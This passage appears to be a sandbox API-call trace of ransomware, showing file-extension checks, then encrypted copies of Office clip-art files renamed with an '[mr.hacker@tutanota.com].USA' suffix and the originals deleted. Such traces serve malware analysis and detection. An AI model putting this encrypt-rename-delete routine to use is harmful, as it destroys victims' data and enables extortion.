lpString2=".WMF") returned -1 [0270.141] lstrlenW (lpString=".7z") returned 3 [0270.141] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0270.142] lstrlenW (lpString=".dbf") returned 4 [0270.142] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0270.142] lstrlenW (lpString=".1cd") returned 4 [0270.142] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0270.142] lstrlenW (lpString=".jpg") returned 4 [0270.142] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0270.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0270.142] lstrlenW (lpString=".doc") returned 4 [0270.142] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.142] lstrlenW (lpString=".docx") returned 5 [0270.142] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.142] lstrlenW (lpString=".pdf") returned 4 [0270.142] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.142] lstrlenW (lpString=".xls") returned 4 [0270.142] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.142] lstrlenW (lpString=".xlsx") returned 5 [0270.142] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.142] lstrlenW (lpString=".ppt") returned 4 [0270.142] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0270.142] lstrlenW (lpString=".zip") returned 4 [0270.142] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.142] lstrlenW (lpString=".rar") returned 4 [0270.142] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.142] lstrlenW (lpString=".bz2") returned 4 [0270.143] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.143] lstrlenW (lpString=".7z") returned 3 [0270.143] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0270.143] lstrlenW (lpString=".dbf") returned 4 [0270.143] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0270.143] lstrlenW (lpString=".1cd") returned 4 [0270.143] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0270.143] lstrlenW (lpString=".jpg") returned 4 [0270.143] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.143] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.143] lstrlenW (lpString="DD01585_.WMF") returned 12 [0270.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.159] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2524) returned 1 [0270.159] CloseHandle (hObject=0x3b0) returned 1 [0270.159] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf")) returned 0x20 [0270.159] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.159] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.159] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.160] GetLastError () returned 0x0 [0270.160] ReadFile (in: hFile=0x3b0, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x9dc, lpOverlapped=0x0) returned 1 [0270.179] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x9e0, lpOverlapped=0x0) returned 1 [0270.180] ReadFile (in: hFile=0x3b0, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.180] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.180] SetEndOfFile (hFile=0x384) returned 1 [0270.249] CloseHandle (hObject=0x384) returned 1 [0270.253] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.253] SetEndOfFile (hFile=0x3b0) returned 1 [0270.260] CloseHandle (hObject=0x3b0) returned 1 [0270.260] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.296] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf")) returned 1 [0270.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0270.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0270.381] lstrlenW (lpString=".doc") returned 4 [0270.381] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.381] lstrlenW (lpString=".docx") returned 5 [0270.381] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.381] lstrlenW (lpString=".pdf") returned 4 [0270.381] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.381] lstrlenW (lpString=".xls") returned 4 [0270.381] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.381] lstrlenW (lpString=".xlsx") returned 5 [0270.381] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.381] lstrlenW (lpString=".ppt") returned 4 [0270.381] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0270.381] lstrlenW (lpString=".zip") returned 4 [0270.381] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.381] lstrlenW (lpString=".rar") returned 4 [0270.382] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.382] lstrlenW (lpString=".bz2") returned 4 [0270.382] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.382] lstrlenW (lpString=".7z") returned 3 [0270.382] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0270.382] lstrlenW (lpString=".dbf") returned 4 [0270.382] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0270.382] lstrlenW (lpString=".1cd") returned 4 [0270.382] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0270.382] lstrlenW (lpString=".jpg") returned 4 [0270.382] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0270.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0270.382] lstrlenW (lpString=".doc") returned 4 [0270.382] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.382] lstrlenW (lpString=".docx") returned 5 [0270.382] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.382] lstrlenW (lpString=".pdf") returned 4 [0270.382] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.382] lstrlenW (lpString=".xls") returned 4 [0270.382] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.382] lstrlenW (lpString=".xlsx") returned 5 [0270.382] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.382] lstrlenW (lpString=".ppt") returned 4 [0270.382] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0270.383] lstrlenW (lpString=".zip") returned 4 [0270.383] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.383] lstrlenW (lpString=".rar") returned 4 [0270.383] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.383] lstrlenW (lpString=".bz2") returned 4 [0270.383] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.383] lstrlenW (lpString=".7z") returned 3 [0270.383] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0270.383] lstrlenW (lpString=".dbf") returned 4 [0270.383] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0270.383] lstrlenW (lpString=".1cd") returned 4 [0270.383] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0270.383] lstrlenW (lpString=".jpg") returned 4 [0270.383] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.383] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.383] lstrlenW (lpString="DD01772_.WMF") returned 12 [0270.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0270.388] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2300) returned 1 [0270.388] CloseHandle (hObject=0x348) returned 1 [0270.388] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf")) returned 0x20 [0270.736] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.736] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.737] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.737] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0270.737] GetLastError () returned 0x0 [0270.737] ReadFile (in: hFile=0x328, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x8fc, lpOverlapped=0x0) returned 1 [0270.775] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x900, lpOverlapped=0x0) returned 1 [0270.776] ReadFile (in: hFile=0x328, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.776] WriteFile (in: hFile=0x3b0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.776] SetEndOfFile (hFile=0x3b0) returned 1 [0270.776] CloseHandle (hObject=0x3b0) returned 1 [0270.776] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.776] SetEndOfFile (hFile=0x328) returned 1 [0270.778] CloseHandle (hObject=0x328) returned 1 [0270.778] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.812] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf")) returned 1 [0270.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0270.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0270.813] lstrlenW (lpString=".doc") returned 4 [0270.813] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.813] lstrlenW (lpString=".docx") returned 5 [0270.813] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.813] lstrlenW (lpString=".pdf") returned 4 [0270.813] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.813] lstrlenW (lpString=".xls") returned 4 [0270.813] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.813] lstrlenW (lpString=".xlsx") returned 5 [0270.813] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.813] lstrlenW (lpString=".ppt") returned 4 [0270.813] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0270.813] lstrlenW (lpString=".zip") returned 4 [0270.813] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.813] lstrlenW (lpString=".rar") returned 4 [0270.813] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.813] lstrlenW (lpString=".bz2") returned 4 [0270.813] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.813] lstrlenW (lpString=".7z") returned 3 [0270.813] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0270.813] lstrlenW (lpString=".dbf") returned 4 [0270.813] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0270.813] lstrlenW (lpString=".1cd") returned 4 [0270.813] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0270.814] lstrlenW (lpString=".jpg") returned 4 [0270.814] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0270.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0270.814] lstrlenW (lpString=".doc") returned 4 [0270.814] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.814] lstrlenW (lpString=".docx") returned 5 [0270.814] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.814] lstrlenW (lpString=".pdf") returned 4 [0270.814] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.814] lstrlenW (lpString=".xls") returned 4 [0270.814] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.814] lstrlenW (lpString=".xlsx") returned 5 [0270.814] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.814] lstrlenW (lpString=".ppt") returned 4 [0270.814] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0270.814] lstrlenW (lpString=".zip") returned 4 [0270.814] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.814] lstrlenW (lpString=".rar") returned 4 [0270.814] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.814] lstrlenW (lpString=".bz2") returned 4 [0270.814] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.814] lstrlenW (lpString=".7z") returned 3 [0270.814] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0270.814] lstrlenW (lpString=".dbf") returned 4 [0270.814] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0270.815] lstrlenW (lpString=".1cd") returned 4 [0270.815] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0270.815] lstrlenW (lpString=".jpg") returned 4 [0270.815] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.815] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.815] lstrlenW (lpString="ED00019_.WMF") returned 12 [0270.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0270.816] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=13042) returned 1 [0270.816] CloseHandle (hObject=0x39c) returned 1 [0270.816] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf")) returned 0x20 [0270.816] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0270.816] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.816] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0270.816] GetLastError () returned 0x0 [0270.816] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x32f2, lpOverlapped=0x0) returned 1 [0270.842] WriteFile (in: hFile=0x3a4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x3300, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x3300, lpOverlapped=0x0) returned 1 [0270.843] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.843] WriteFile (in: hFile=0x3a4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.843] SetEndOfFile (hFile=0x3a4) returned 1 [0270.843] CloseHandle (hObject=0x3a4) returned 1 [0270.843] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.843] SetEndOfFile (hFile=0x39c) returned 1 [0270.846] CloseHandle (hObject=0x39c) returned 1 [0270.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.847] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf")) returned 1 [0270.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63 [0270.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63 [0270.847] lstrlenW (lpString=".doc") returned 4 [0270.847] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.847] lstrlenW (lpString=".docx") returned 5 [0270.847] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.847] lstrlenW (lpString=".pdf") returned 4 [0270.847] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.847] lstrlenW (lpString=".xls") returned 4 [0270.847] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.847] lstrlenW (lpString=".xlsx") returned 5 [0270.847] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.847] lstrlenW (lpString=".ppt") returned 4 [0270.847] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63 [0270.848] lstrlenW (lpString=".zip") returned 4 [0270.848] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.848] lstrlenW (lpString=".rar") returned 4 [0270.848] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.848] lstrlenW (lpString=".bz2") returned 4 [0270.848] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.848] lstrlenW (lpString=".7z") returned 3 [0270.848] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63 [0270.848] lstrlenW (lpString=".dbf") returned 4 [0270.848] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 63 [0270.848] lstrlenW (lpString=".1cd") returned 4 [0270.848] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 